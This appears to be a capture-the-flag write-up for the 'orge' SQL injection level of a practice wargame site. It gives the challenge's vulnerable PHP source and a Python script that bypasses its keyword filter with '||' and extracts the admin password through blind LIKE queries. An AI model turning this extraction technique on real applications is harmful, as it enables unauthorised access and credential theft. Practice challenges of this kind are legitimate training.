Hello {$result[id]}

Hello {$result[id]}

Hello {$result[id]}

ORGE Clear!

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 
  highlight_file(__FILE__); 
?>

#!/usr/bin/env python
# -*- coding: utf8 -*-

import requests

headers = {'Cookie': 'PHPSESSID=rhijn6n7j32iq1sketdpdhk7bn;'}
url = "<https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php>"
string = "1234567890abcdefghijklmnopqrstuvwxyz"

pw= ""
len = 1

while 1 :
    query = "?pw=' || length(pw) = " + str(len) + "%23"
    r = requests.get(url+query,headers=headers)
    if r.text.find('Hello admin') != -1 :
        break
    len += 1
print ("passwd length : ",len)

for i in range (1,len+1) :
    for j in string :
        query = "?pw=' || pw like \\'" + pw + j + "%"
        r = requests.get(url + query, headers=headers)
        if r.text.find('Hello admin') != -1:
            pw = pw + j
            break

    print ("passwd : ", pw)